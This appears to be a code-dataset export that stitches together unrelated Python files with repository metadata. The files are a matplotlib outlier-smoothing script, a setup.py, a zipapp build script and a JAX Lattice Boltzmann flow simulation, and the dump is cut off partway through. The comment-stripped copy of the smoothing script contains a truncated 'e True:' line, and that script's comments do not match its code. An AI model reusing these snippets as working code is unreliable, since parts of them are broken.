LOGIN_URL = reverse_lazy("accounts:login")
THUMBNAIL_EXTENSION = 'png'
| true | true |
f7234adbc9c065098ba45b81f8e57e7b90b5b899 | 4,461 | py | Python | matplotlib/line.py | aimimi2015/LDA_patent | e5df0b8e1b741c19352485b5b2dca560e1a961f1 | [
"Apache-2.0"
] | 2 | 2018-08-22T03:46:54.000Z | 2020-02-08T10:20:26.000Z | matplotlib/line.py | aimimi2015/LDA_patent | e5df0b8e1b741c19352485b5b2dca560e1a961f1 | [
"Apache-2.0"
] | null | null | null | matplotlib/line.py | aimimi2015/LDA_patent | e5df0b8e1b741c19352485b5b2dca560e1a961f1 | [
"Apache-2.0"
] | 1 | 2019-04-29T06:16:54.000Z | 2019-04-29T06:16:54.000Z | # coding: utf-8
from __future__ import print_function
from __future__ import print_function
from __future__ import print_function
import matplotlib.pyplot as plt
import numpy as np
import pickle
import pprint
import matplotlib.pyplot as plt
import numpy as np
import pymysql
import pickle
from sympy import *
#x1 = np.arange(1, 23, 1)
# y = np.array([4.00, 6.40, 8.00, 8.80, 9.22, 9.50, 9.70, 9.86, 10.00, 10.20, 10.32, 11.42, 12.00, 12.42, 13.00, 15.00, 16.20, 17.32, 19.42, 21.00])
#y1 = np.array([0.145, 0.046, 0.044, 0.040, 0.18, 0.047, 0.048 ,0.13, 0.035, 0.035, 0.032,0.145, 0.046, 0.044, 0.040, 0.18, 0.047, 0.048 ,0.13, 0.035, 0.035, 0.032])
pkl_file = open('../领域预测/topiclist/list22.pkl', 'rb')
list1 = pickle.load(pkl_file)
#print(json.dumps(list1 , encoding='UTF-8', ensure_ascii=False))
#print len(list1)
newlist=[]
sumlist=0
i=0
h=0
j=1 #这是间隔,如果 =1,就是一个月一个月的
while i<len(list1):
while h<j:
sumlist = sumlist+list1[i+h]
h=h+1
newlist.append(sumlist)
sumlist=0
h=0
i=i+j
print (len(newlist))
x = np.arange(1, len(newlist)+1, 1)
#y = np.array([4.00, 6.40, 8.00, 8.80, 9.22, 9.50, 9.70, 9.86, 10.00, 10.20, 10.32, 11.42, 12.00, 12.42, 13.00, 15.00, 16.20, 17.32, 19.42, 21.00])
y = np.array(newlist)
z1 = np.polyfit(x, y, 2) # 用3次多项式拟合
p1 = np.poly1d(z1)
yvals = p1(x)
p2 = abs(yvals - y)
sigma = np.std(p2)
print(sigma)
print(p2)
'''
具体来说,三西格玛规则是建立在数据服从正态分布的基础之上的,其阈值为
正态分布平均值与三倍标准差之和。在正态分布中标准差为𝜎,均值为𝜇,对于全部
的数据来说,数值分布在(𝜇 − 𝜎,𝜇 + 𝜎)中的概率为 0.655,布在(𝜇 − 2𝜎,𝜇 + 2𝜎)中的
概率为 0.954,分布在(𝜇 − 3𝜎,𝜇 + 3𝜎)中的概率大致为 0.997。规则规定任何大于三
西格玛阈值的值都极有可能是异常值。因此我们以图 4.3 中程序移除异常值,并进行
临近数据点平均值替换。
'''
print ("p1:"),
print(p1) # 在屏幕上打印拟合多项式
yvals = p1(x) # 也可以使用yvals=np.polyval(z1,x)
ybar = np.sum(y) / len(y)
#print(type(np.mean(p2)))
out = p2>sigma*3
#print(type(out))
print (out)
ssreg = np.sum((yvals - ybar) ** 2) #拟合数据方差
sstot = np.sum((y - ybar) ** 2) #原始数据方差
print (ssreg / sstot) # 准确率
plot1 = plt.plot(x, y, '*', label='original values')
plot2 = plt.plot(x, yvals, 'r', label='polyfit values')
plt.xlabel('year(05-15)')
plt.ylabel('Proportion')
plt.legend(loc=4) # 指定legend的位置,读者可以自己help它的用法
plt.title('topic1')
plt.show()
plt.savefig('p1.png')
y_new = y.tolist() #准备修改 这就是之后被替换的新的y分布
yvals1 = yvals.tolist() #准备修改
#
# def quzao(sigma,y_new,yvals1):
# i=0
# while i < len(y_new):
# if abs(y_new[i] - yvals1[i]) >= sigma * 3:
# print(y_new[i])
# if i != 0 and i != len(y) - 1:
# y_new[i] = (y_new[i - 1] + y_new[i - 2]) * 0.5
#
# elif i == len(y) - 1:
# y_new[i] = (y_new[len(y) - 2] + y_new[len(y) - 3]) * 0.5
#
# z1 = np.polyfit(x, y_new, 2) # 用3次多项式拟合
# p1 = np.poly1d(z1)
#
# i = i + 1
while True:
i = 0
while i < len(y):
if abs(y_new[i]-yvals1[i])>=sigma*3:
print (y_new[i])
if i!=0 and i!=len(y)-1:
y_new[i] = (y_new[i - 1] + y_new[i-2]) * 0.5
elif i==1:
y_new[i] = (y_new[0] + y_new[2]) * 0.5
#z1 = np.polyfit(x, y_new, 2) # 用3次多项式拟合
#p1 = np.poly1d(z1)
# yvals_new = p1(x1)
# plot_new1 = plt.plot(x1, y_new, '*', label='original values')
# plot_new12 = plt.plot(x1, yvals_new, 'r', label='polyfit values')
# plt.xlabel('x axis')
# plt.ylabel('y axis')
# plt.legend(loc=4) # 指定legend的位置
# plt.title('polyfitting')
# plt.show()
# print('========')
i=i+1
z1 = np.polyfit(x, y_new, 2) # 用3次多项式拟合
p1 = np.poly1d(z1)
yvals = p1(x)
p2 = abs(yvals - y_new)
sigma1 = np.std(p2)
print(sigma1)
if(sigma==sigma1):
break
else:
sigma=sigma1
print(y_new)
z_new = np.polyfit(x, y_new, 2) # 用3次多项式拟合
p_new = np.poly1d(z_new)
yvals_new = p_new(x)
ybar_new = np.sum(y_new) / len(y)
ssreg = np.sum((yvals_new - ybar_new) ** 2)
sstot = np.sum((y_new - ybar_new) ** 2)
sstot_old = np.sum((y - ybar) ** 2) #原始数据方差
print (ssreg / sstot_old) # 准确率
plot_new1 = plt.plot(x, y_new, '*', label='original values')
plot_new12 = plt.plot(x, yvals_new, 'r', label='polyfit values')
plt.xlabel('year(05-15)')
plt.ylabel('Proportion')
plt.legend(loc=4) # 指定legend的位置
plt.title('topic10')
plt.show()
plt.savefig('p1.png')
print(p_new)
# # 定义函数变量x
# x=Symbol("x")
#
# # 对函数sin(x)求导,并且显示
# print(diff(p_new, x)) | 25.061798 | 165 | 0.576328 |
from __future__ import print_function
from __future__ import print_function
from __future__ import print_function
import matplotlib.pyplot as plt
import numpy as np
import pickle
import pprint
import matplotlib.pyplot as plt
import numpy as np
import pymysql
import pickle
from sympy import *
pkl_file = open('../领域预测/topiclist/list22.pkl', 'rb')
list1 = pickle.load(pkl_file)
newlist=[]
sumlist=0
i=0
h=0
j=1
while i<len(list1):
while h<j:
sumlist = sumlist+list1[i+h]
h=h+1
newlist.append(sumlist)
sumlist=0
h=0
i=i+j
print (len(newlist))
x = np.arange(1, len(newlist)+1, 1)
y = np.array(newlist)
z1 = np.polyfit(x, y, 2)
p1 = np.poly1d(z1)
yvals = p1(x)
p2 = abs(yvals - y)
sigma = np.std(p2)
print(sigma)
print(p2)
print ("p1:"),
print(p1)
yvals = p1(x)
ybar = np.sum(y) / len(y)
out = p2>sigma*3
print (out)
ssreg = np.sum((yvals - ybar) ** 2)
sstot = np.sum((y - ybar) ** 2)
print (ssreg / sstot)
plot1 = plt.plot(x, y, '*', label='original values')
plot2 = plt.plot(x, yvals, 'r', label='polyfit values')
plt.xlabel('year(05-15)')
plt.ylabel('Proportion')
plt.legend(loc=4)
plt.title('topic1')
plt.show()
plt.savefig('p1.png')
y_new = y.tolist()
yvals1 = yvals.tolist()
e True:
i = 0
while i < len(y):
if abs(y_new[i]-yvals1[i])>=sigma*3:
print (y_new[i])
if i!=0 and i!=len(y)-1:
y_new[i] = (y_new[i - 1] + y_new[i-2]) * 0.5
elif i==1:
y_new[i] = (y_new[0] + y_new[2]) * 0.5
i=i+1
z1 = np.polyfit(x, y_new, 2)
p1 = np.poly1d(z1)
yvals = p1(x)
p2 = abs(yvals - y_new)
sigma1 = np.std(p2)
print(sigma1)
if(sigma==sigma1):
break
else:
sigma=sigma1
print(y_new)
z_new = np.polyfit(x, y_new, 2)
p_new = np.poly1d(z_new)
yvals_new = p_new(x)
ybar_new = np.sum(y_new) / len(y)
ssreg = np.sum((yvals_new - ybar_new) ** 2)
sstot = np.sum((y_new - ybar_new) ** 2)
sstot_old = np.sum((y - ybar) ** 2)
print (ssreg / sstot_old)
plot_new1 = plt.plot(x, y_new, '*', label='original values')
plot_new12 = plt.plot(x, yvals_new, 'r', label='polyfit values')
plt.xlabel('year(05-15)')
plt.ylabel('Proportion')
plt.legend(loc=4)
plt.title('topic10')
plt.show()
plt.savefig('p1.png')
print(p_new)
| true | true |
f7234ae3e592912852a4bba4f2ff0826aa6d22b8 | 2,183 | py | Python | setup.py | exemplarysoftware/thecut-forms | 6c376a382862ebe05e843c1c4c934c98089b0ea2 | [
"Apache-2.0"
] | null | null | null | setup.py | exemplarysoftware/thecut-forms | 6c376a382862ebe05e843c1c4c934c98089b0ea2 | [
"Apache-2.0"
] | null | null | null | setup.py | exemplarysoftware/thecut-forms | 6c376a382862ebe05e843c1c4c934c98089b0ea2 | [
"Apache-2.0"
] | null | null | null | from __future__ import print_function
import codecs
import io
import os
from thecut.forms import __version__
from setuptools import setup, find_packages
import sys
here = os.path.abspath(os.path.dirname(__file__))
def read(*filenames, **kwargs):
encoding = kwargs.get('encoding', 'utf-8')
sep = kwargs.get('sep', '\n')
buf = []
for filename in filenames:
filename = os.path.join(here, filename)
with io.open(filename, encoding=encoding) as f:
buf.append(f.read())
return sep.join(buf)
long_description = read('README.rst', 'HISTORY.rst')
setup(
# General information
name='thecut-forms',
version=__version__,
# Packaging
packages=find_packages(exclude=['docs']),
namespace_packages=['thecut'],
include_package_data=True,
# Dependencies
install_requires=[],
# Author information
author='The Cut Creative',
author_email='development@thecut.net.au',
# Additional information
url='https://github.com/thecut/thecut-forms',
license='Apache Software License 2.0',
description='A reusable application.',
long_description=long_description,
platforms='any',
classifiers=[
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Development Status :: 5 - Production/Stable',
'Natural Language :: English',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Software Development :: Libraries :: Application Frameworks',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Framework :: Django',
'Framework :: Django :: 1.8',
'Framework :: Django :: 1.10',
'Framework :: Django :: 1.11',
],
)
| 30.746479 | 79 | 0.633532 | from __future__ import print_function
import codecs
import io
import os
from thecut.forms import __version__
from setuptools import setup, find_packages
import sys
here = os.path.abspath(os.path.dirname(__file__))
def read(*filenames, **kwargs):
encoding = kwargs.get('encoding', 'utf-8')
sep = kwargs.get('sep', '\n')
buf = []
for filename in filenames:
filename = os.path.join(here, filename)
with io.open(filename, encoding=encoding) as f:
buf.append(f.read())
return sep.join(buf)
long_description = read('README.rst', 'HISTORY.rst')
setup(
name='thecut-forms',
version=__version__,
packages=find_packages(exclude=['docs']),
namespace_packages=['thecut'],
include_package_data=True,
install_requires=[],
author='The Cut Creative',
author_email='development@thecut.net.au',
url='https://github.com/thecut/thecut-forms',
license='Apache Software License 2.0',
description='A reusable application.',
long_description=long_description,
platforms='any',
classifiers=[
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Development Status :: 5 - Production/Stable',
'Natural Language :: English',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Software Development :: Libraries :: Application Frameworks',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Framework :: Django',
'Framework :: Django :: 1.8',
'Framework :: Django :: 1.10',
'Framework :: Django :: 1.11',
],
)
| true | true |
f7234ba476f63fb75a3db59019e0e59af746bdf4 | 202 | py | Python | build.py | AliceAndTheBuilders/es-tenso | 7f0a24fbe4774919e849087d3bbbde6174928e1a | [
"MIT"
] | 3 | 2017-03-17T09:40:42.000Z | 2017-04-12T16:21:39.000Z | build.py | misleem/es-tenso | 799a58f765efdf2a57348129c9a0a44879dc63bb | [
"MIT"
] | 4 | 2017-03-06T19:17:13.000Z | 2017-03-22T09:59:53.000Z | build.py | misleem/es-tenso | 799a58f765efdf2a57348129c9a0a44879dc63bb | [
"MIT"
] | 2 | 2017-05-10T12:50:12.000Z | 2018-05-30T10:54:29.000Z | import zipapp
from tenso.version import __version__
target_name = "dist/tenso-" + str(__version__) + ".pyz"
print("Building: " + target_name)
zipapp.create_archive(target=target_name, source="tenso")
| 25.25 | 57 | 0.762376 | import zipapp
from tenso.version import __version__
target_name = "dist/tenso-" + str(__version__) + ".pyz"
print("Building: " + target_name)
zipapp.create_archive(target=target_name, source="tenso")
| true | true |
f7234c0e2482adef9bfa3a12c21d0f016557b1f6 | 13,122 | py | Python | lattice_boltzmann_method_python_jax.py | Ceyron/Lattice-Boltzmann-Method-JAX | f18e136e6e12fa575104053818c53b1689e50948 | [
"MIT"
] | null | null | null | lattice_boltzmann_method_python_jax.py | Ceyron/Lattice-Boltzmann-Method-JAX | f18e136e6e12fa575104053818c53b1689e50948 | [
"MIT"
] | null | null | null | lattice_boltzmann_method_python_jax.py | Ceyron/Lattice-Boltzmann-Method-JAX | f18e136e6e12fa575104053818c53b1689e50948 | [
"MIT"
] | null | null | null | r"""
Solves the incompressible Navier Stokes equations using the Lattice-Boltzmann
Method¹. The scenario is the flow around a cylinder in 2D which yields a van
Karman vortex street.
periodic
+-------------------------------------------------------------+
| |
| ---> |
| |
| ---> **** |
| ******** |
inflow | ---> ********** | outflow
| ******** |
| ---> **** |
| |
| ---> |
| |
+-------------------------------------------------------------+
periodic
-> uniform inflow profile with only horizontal velocities at left boundary
-> outflow boundary at the right
-> top and bottom boundary connected by periodicity
-> the circle in the center (representing a slice from the 3d cylinder)
uses a no-slip Boundary Condition
-> initially, fluid is NOT at rest and has the horizontal velocity profile
all over the domain
¹ To be fully correct, LBM considers the compressible Navier-Stokes Equations.
This can also be seen by the fact that we have a changing macroscopic density over
the domain and that we actively use it throughout the computations. However, our
flow speeds are below the 0.3 Mach limit which results in only minor density
fluctuations. Hence, the fluid behaves almost incompressible.
------
Solution strategy:
Discretize the domain into a Cartesian mesh. Each grid vertex is associated
with 9 discrete velocities (D2Q9) and 2 macroscopic velocities. Then iterate
over time.
1. Apply outflow boundary condition on the right boundary
2. Compute Macroscopic Quantities (density and velocities)
3. Apply Inflow Profile by Zou/He Dirichlet Boundary Condition
on the left boundary
4. Compute the discrete equilibria velocities
5. Perform a Collision step according to BGK (Bhatnagar–Gross–Krook)
6. Apply Bounce-Back Boundary Conditions on the cylinder obstacle
7. Stream alongside the lattice velocities
8. Advance in time (repeat the loop)
The 7th step implicitly yields the periodic Boundary Conditions at
the top and bottom boundary.
------
Employed Discretization:
D2Q9 grid, i.e. 2-dim space with 9 discrete
velocities per node. In Other words the 2d space is discretized into
N_x by N_y by 9 points.
6 2 5
\ | /
3 - 0 - 1
/ | \
7 4 8
Therefore we have the shapes:
- macroscopic velocity : (N_x, N_y, 2)
- discrete velocity : (N_x, N_y, 9)
- density : (N_x, N_y)
------
Lattice Boltzmann Computations
Density:
ρ = ∑ᵢ fᵢ
Velocities:
u = 1/ρ ∑ᵢ fᵢ cᵢ
Equilibrium:
fᵢᵉ = ρ Wᵢ (1 + 3 cᵢ ⋅ u + 9/2 (cᵢ ⋅ u)² − 3/2 ||u||₂²)
BGK Collision:
fᵢ ← fᵢ − ω (fᵢ − fᵢᵉ)
with the following quantities:
fᵢ : Discrete velocities
fᵢᵉ : Equilibrium discrete velocities
ρ : Density
∑ᵢ : Summation over all discrete velocities
cᵢ : Lattice Velocities
Wᵢ : Lattice Weights
ω : Relaxation factor
------
The flow configuration is defined using the Reynolds Number
Re = (U R) / ν
with:
Re : Reynolds Number
U : Inflow Velocity
R : Cylinder Radius
ν : Kinematic Viscosity
Can be re-arranged in terms of the kinematic viscosity
ν = (U R) / Re
Then the relaxation factor is computed according to
ω = 1 / (3 ν + 0.5)
------
Note that this scheme can become unstable for Reynoldsnumbers >~ 350 ²
² Note that the stability of the D2Q9 scheme is mathematically not
linked to the Reynoldsnumber. Just use this as a reference. Stability
for this scheme is realted to the velocity magnitude.
Consequentially, the actual limiting factor is the Mach number (the
ratio between velocity magnitude and the speed of sound).
"""
import jax
import jax.numpy as jnp
import matplotlib.pyplot as plt
import cmasher as cmr
from tqdm import tqdm
N_ITERATIONS = 15_000
REYNOLDS_NUMBER = 80
N_POINTS_X = 300
N_POINTS_Y = 50
CYLINDER_CENTER_INDEX_X = N_POINTS_X // 5
CYLINDER_CENTER_INDEX_Y = N_POINTS_Y // 2
CYLINDER_RADIUS_INDICES = N_POINTS_Y // 9
MAX_HORIZONTAL_INFLOW_VELOCITY = 0.04
VISUALIZE = True
PLOT_EVERY_N_STEPS = 100
SKIP_FIRST_N_ITERATIONS = 5000
r"""
LBM Grid: D2Q9
6 2 5
\ | /
3 - 0 - 1
/ | \
7 4 8
"""
N_DISCRETE_VELOCITIES = 9
LATTICE_VELOCITIES = jnp.array([
[ 0, 1, 0, -1, 0, 1, -1, -1, 1,],
[ 0, 0, 1, 0, -1, 1, 1, -1, -1,]
])
LATTICE_INDICES = jnp.array([
0, 1, 2, 3, 4, 5, 6, 7, 8,
])
OPPOSITE_LATTICE_INDICES = jnp.array([
0, 3, 4, 1, 2, 7, 8, 5, 6,
])
LATTICE_WEIGHTS = jnp.array([
4/9, # Center Velocity [0,]
1/9, 1/9, 1/9, 1/9, # Axis-Aligned Velocities [1, 2, 3, 4]
1/36, 1/36, 1/36, 1/36, # 45 ° Velocities [5, 6, 7, 8]
])
RIGHT_VELOCITIES = jnp.array([1, 5, 8])
UP_VELOCITIES = jnp.array([2, 5, 6])
LEFT_VELOCITIES = jnp.array([3, 6, 7])
DOWN_VELOCITIES = jnp.array([4, 7, 8])
PURE_VERTICAL_VELOCITIES = jnp.array([0, 2, 4])
PURE_HORIZONTAL_VELOCITIES = jnp.array([0, 1, 3])
def get_density(discrete_velocities):
density = jnp.sum(discrete_velocities, axis=-1)
return density
def get_macroscopic_velocities(discrete_velocities, density):
macroscopic_velocities = jnp.einsum(
"NMQ,dQ->NMd",
discrete_velocities,
LATTICE_VELOCITIES,
) / density[..., jnp.newaxis]
return macroscopic_velocities
def get_equilibrium_discrete_velocities(macroscopic_velocities, density):
projected_discrete_velocities = jnp.einsum(
"dQ,NMd->NMQ",
LATTICE_VELOCITIES,
macroscopic_velocities,
)
macroscopic_velocity_magnitude = jnp.linalg.norm(
macroscopic_velocities,
axis=-1,
ord=2,
)
equilibrium_discrete_velocities = (
density[..., jnp.newaxis]
*
LATTICE_WEIGHTS[jnp.newaxis, jnp.newaxis, :]
*
(
1
+
3 * projected_discrete_velocities
+
9/2 * projected_discrete_velocities**2
-
3/2 * macroscopic_velocity_magnitude[..., jnp.newaxis]**2
)
)
return equilibrium_discrete_velocities
def main():
jax.config.update("jax_enable_x64", True)
kinematic_viscosity = (
(
MAX_HORIZONTAL_INFLOW_VELOCITY
*
CYLINDER_RADIUS_INDICES
) / (
REYNOLDS_NUMBER
)
)
relaxation_omega = (
(
1.0
) / (
3.0
*
kinematic_viscosity
+
0.5
)
)
# Define a mesh
x = jnp.arange(N_POINTS_X)
y = jnp.arange(N_POINTS_Y)
X, Y = jnp.meshgrid(x, y, indexing="ij")
# Obstacle Mask: An array of the shape like X or Y, but contains True if the
# point belongs to the obstacle and False if not
obstacle_mask = (
jnp.sqrt(
(
X
-
CYLINDER_CENTER_INDEX_X
)**2
+
(
Y
-
CYLINDER_CENTER_INDEX_Y
)**2
)
<
CYLINDER_RADIUS_INDICES
)
velocity_profile = jnp.zeros((N_POINTS_X, N_POINTS_Y, 2))
velocity_profile = velocity_profile.at[:, :, 0].set(MAX_HORIZONTAL_INFLOW_VELOCITY)
@jax.jit
def update(discrete_velocities_prev):
# (1) Prescribe the outflow BC on the right boundary
discrete_velocities_prev = discrete_velocities_prev.at[-1, :, LEFT_VELOCITIES].set(
discrete_velocities_prev[-2, :, LEFT_VELOCITIES]
)
# (2) Macroscopic Velocities
density_prev = get_density(discrete_velocities_prev)
macroscopic_velocities_prev = get_macroscopic_velocities(
discrete_velocities_prev,
density_prev,
)
# (3) Prescribe Inflow Dirichlet BC using Zou/He scheme
macroscopic_velocities_prev =\
macroscopic_velocities_prev.at[0, 1:-1, :].set(
velocity_profile[0, 1:-1, :]
)
density_prev = density_prev.at[0, :].set(
(
get_density(discrete_velocities_prev[0, :, PURE_VERTICAL_VELOCITIES].T)
+
2 *
get_density(discrete_velocities_prev[0, :, LEFT_VELOCITIES].T)
) / (
1 - macroscopic_velocities_prev[0, :, 0]
)
)
# (4) Compute discrete Equilibria velocities
equilibrium_discrete_velocities = get_equilibrium_discrete_velocities(
macroscopic_velocities_prev,
density_prev,
)
# (3) Belongs to the Zou/He scheme
discrete_velocities_prev = \
discrete_velocities_prev.at[0, :, RIGHT_VELOCITIES].set(
equilibrium_discrete_velocities[0, :, RIGHT_VELOCITIES]
)
# (5) Collide according to BGK
discrete_velocities_post_collision = (
discrete_velocities_prev
-
relaxation_omega
*
(
discrete_velocities_prev
-
equilibrium_discrete_velocities
)
)
# (6) Bounce-Back Boundary Conditions to enfore the no-slip
for i in range(N_DISCRETE_VELOCITIES):
discrete_velocities_post_collision =\
discrete_velocities_post_collision.at[obstacle_mask, LATTICE_INDICES[i]].set(
discrete_velocities_prev[obstacle_mask, OPPOSITE_LATTICE_INDICES[i]]
)
# (7) Stream alongside lattice velocities
discrete_velocities_streamed = discrete_velocities_post_collision
for i in range(N_DISCRETE_VELOCITIES):
discrete_velocities_streamed = discrete_velocities_streamed.at[:, :, i].set(
jnp.roll(
jnp.roll(
discrete_velocities_post_collision[:, :, i],
LATTICE_VELOCITIES[0, i],
axis=0,
),
LATTICE_VELOCITIES[1, i],
axis=1,
)
)
return discrete_velocities_streamed
discrete_velocities_prev = get_equilibrium_discrete_velocities(
velocity_profile,
jnp.ones((N_POINTS_X, N_POINTS_Y)),
)
plt.style.use("dark_background")
plt.figure(figsize=(15, 6), dpi=100)
for iteration_index in tqdm(range(N_ITERATIONS)):
discrete_velocities_next = update(discrete_velocities_prev)
discrete_velocities_prev = discrete_velocities_next
if iteration_index % PLOT_EVERY_N_STEPS == 0 and VISUALIZE and iteration_index > SKIP_FIRST_N_ITERATIONS:
density = get_density(discrete_velocities_next)
macroscopic_velocities = get_macroscopic_velocities(
discrete_velocities_next,
density,
)
velocity_magnitude = jnp.linalg.norm(
macroscopic_velocities,
axis=-1,
ord=2,
)
d_u__d_x, d_u__d_y = jnp.gradient(macroscopic_velocities[..., 0])
d_v__d_x, d_v__d_y = jnp.gradient(macroscopic_velocities[..., 1])
curl = (d_u__d_y - d_v__d_x)
# Velocity Magnitude Contour Plot in the top
plt.subplot(211)
plt.contourf(
X,
Y,
velocity_magnitude,
levels=50,
cmap=cmr.amber,
)
plt.colorbar().set_label("Velocity Magnitude")
plt.gca().add_patch(plt.Circle(
(CYLINDER_CENTER_INDEX_X, CYLINDER_CENTER_INDEX_Y),
CYLINDER_RADIUS_INDICES,
color="darkgreen",
))
# Vorticity Magnitude Contour PLot in the bottom
plt.subplot(212)
plt.contourf(
X,
Y,
curl,
levels=50,
cmap=cmr.redshift,
vmin=-0.02,
vmax= 0.02,
)
plt.colorbar().set_label("Vorticity Magnitude")
plt.gca().add_patch(plt.Circle(
(CYLINDER_CENTER_INDEX_X, CYLINDER_CENTER_INDEX_Y),
CYLINDER_RADIUS_INDICES,
color="darkgreen",
))
plt.draw()
plt.pause(0.0001)
plt.clf()
if VISUALIZE:
plt.show()
if __name__ == "__main__":
main()
| 28.341253 | 113 | 0.561195 | import jax
import jax.numpy as jnp
import matplotlib.pyplot as plt
import cmasher as cmr
from tqdm import tqdm
N_ITERATIONS = 15_000
REYNOLDS_NUMBER = 80
N_POINTS_X = 300
N_POINTS_Y = 50
CYLINDER_CENTER_INDEX_X = N_POINTS_X // 5
CYLINDER_CENTER_INDEX_Y = N_POINTS_Y // 2
CYLINDER_RADIUS_INDICES = N_POINTS_Y // 9
MAX_HORIZONTAL_INFLOW_VELOCITY = 0.04
VISUALIZE = True
PLOT_EVERY_N_STEPS = 100
SKIP_FIRST_N_ITERATIONS = 5000
N_DISCRETE_VELOCITIES = 9
LATTICE_VELOCITIES = jnp.array([
[ 0, 1, 0, -1, 0, 1, -1, -1, 1,],
[ 0, 0, 1, 0, -1, 1, 1, -1, -1,]
])
LATTICE_INDICES = jnp.array([
0, 1, 2, 3, 4, 5, 6, 7, 8,
])
OPPOSITE_LATTICE_INDICES = jnp.array([
0, 3, 4, 1, 2, 7, 8, 5, 6,
])
LATTICE_WEIGHTS = jnp.array([
4/9,
1/9, 1/9, 1/9, 1/9,
1/36, 1/36, 1/36, 1/36,
])
RIGHT_VELOCITIES = jnp.array([1, 5, 8])
UP_VELOCITIES = jnp.array([2, 5, 6])
LEFT_VELOCITIES = jnp.array([3, 6, 7])
DOWN_VELOCITIES = jnp.array([4, 7, 8])
PURE_VERTICAL_VELOCITIES = jnp.array([0, 2, 4])
PURE_HORIZONTAL_VELOCITIES = jnp.array([0, 1, 3])
def get_density(discrete_velocities):
density = jnp.sum(discrete_velocities, axis=-1)
return density
def get_macroscopic_velocities(discrete_velocities, density):
macroscopic_velocities = jnp.einsum(
"NMQ,dQ->NMd",
discrete_velocities,
LATTICE_VELOCITIES,
) / density[..., jnp.newaxis]
return macroscopic_velocities
def get_equilibrium_discrete_velocities(macroscopic_velocities, density):
projected_discrete_velocities = jnp.einsum(
"dQ,NMd->NMQ",
LATTICE_VELOCITIES,
macroscopic_velocities,
)
macroscopic_velocity_magnitude = jnp.linalg.norm(
macroscopic_velocities,
axis=-1,
ord=2,
)
equilibrium_discrete_velocities = (
density[..., jnp.newaxis]
*
LATTICE_WEIGHTS[jnp.newaxis, jnp.newaxis, :]
*
(
1
+
3 * projected_discrete_velocities
+
9/2 * projected_discrete_velocities**2
-
3/2 * macroscopic_velocity_magnitude[..., jnp.newaxis]**2
)
)
return equilibrium_discrete_velocities
def main():
jax.config.update("jax_enable_x64", True)
kinematic_viscosity = (
(
MAX_HORIZONTAL_INFLOW_VELOCITY
*
CYLINDER_RADIUS_INDICES
) / (
REYNOLDS_NUMBER
)
)
relaxation_omega = (
(
1.0
) / (
3.0
*
kinematic_viscosity
+
0.5
)
)
x = jnp.arange(N_POINTS_X)
y = jnp.arange(N_POINTS_Y)
X, Y = jnp.meshgrid(x, y, indexing="ij")
obstacle_mask = (
jnp.sqrt(
(
X
-
CYLINDER_CENTER_INDEX_X
)**2
+
(
Y
-
CYLINDER_CENTER_INDEX_Y
)**2
)
<
CYLINDER_RADIUS_INDICES
)
velocity_profile = jnp.zeros((N_POINTS_X, N_POINTS_Y, 2))
velocity_profile = velocity_profile.at[:, :, 0].set(MAX_HORIZONTAL_INFLOW_VELOCITY)
@jax.jit
def update(discrete_velocities_prev):
discrete_velocities_prev = discrete_velocities_prev.at[-1, :, LEFT_VELOCITIES].set(
discrete_velocities_prev[-2, :, LEFT_VELOCITIES]
)
density_prev = get_density(discrete_velocities_prev)
macroscopic_velocities_prev = get_macroscopic_velocities(
discrete_velocities_prev,
density_prev,
)
macroscopic_velocities_prev =\
macroscopic_velocities_prev.at[0, 1:-1, :].set(
velocity_profile[0, 1:-1, :]
)
density_prev = density_prev.at[0, :].set(
(
get_density(discrete_velocities_prev[0, :, PURE_VERTICAL_VELOCITIES].T)
+
2 *
get_density(discrete_velocities_prev[0, :, LEFT_VELOCITIES].T)
) / (
1 - macroscopic_velocities_prev[0, :, 0]
)
)
equilibrium_discrete_velocities = get_equilibrium_discrete_velocities(
macroscopic_velocities_prev,
density_prev,
)
discrete_velocities_prev = \
discrete_velocities_prev.at[0, :, RIGHT_VELOCITIES].set(
equilibrium_discrete_velocities[0, :, RIGHT_VELOCITIES]
)
discrete_velocities_post_collision = (
discrete_velocities_prev
-
relaxation_omega
*
(
discrete_velocities_prev
-
equilibrium_discrete_velocities
)
)
for i in range(N_DISCRETE_VELOCITIES):
discrete_velocities_post_collision =\
discrete_velocities_post_collision.at[obstacle_mask, LATTICE_INDICES[i]].set(
discrete_velocities_prev[obstacle_mask, OPPOSITE_LATTICE_INDICES[i]]
)
discrete_velocities_streamed = discrete_velocities_post_collision
for i in range(N_DISCRETE_VELOCITIES):
discrete_velocities_streamed = discrete_velocities_streamed.at[:, :, i].set(
jnp.roll(
jnp.roll(
discrete_velocities_post_collision[:, :, i],
LATTICE_VELOCITIES[0, i],
axis=0,
),
LATTICE_VELOCITIES[1, i],
axis=1,
)
)
return discrete_velocities_streamed
discrete_velocities_prev = get_equilibrium_discrete_velocities(
velocity_profile,
jnp.ones((N_POINTS_X, N_POINTS_Y)),
)
plt.style.use("dark_background")
plt.figure(figsize=(15, 6), dpi=100)
for iteration_index in tqdm(range(N_ITERATIONS)):
discrete_velocities_next = update(discrete_velocities_prev)
discrete_velocities_prev = discrete_velocities_next
if iteration_index % PLOT_EVERY_N_STEPS == 0 and VISUALIZE and iteration_index > SKIP_FIRST_N_ITERATIONS:
density = get_density(discrete_velocities_next)
macroscopic_velocities = get_macroscopic_velocities(
discrete_velocities_next,
density,
)
velocity_magnitude = jnp.linalg.norm(
macroscopic_velocities,
axis=-1,
ord=2,
)
d_u__d_x, d_u__d_y = jnp.gradient(macroscopic_velocities[..., 0])
d_v__d_x, d_v__d_y = jnp.gradient(macroscopic_velocities[..., 1])
curl = (d_u__d_y - d_v__d_x)
plt.subplot(211)
plt.contourf(
X,
Y,
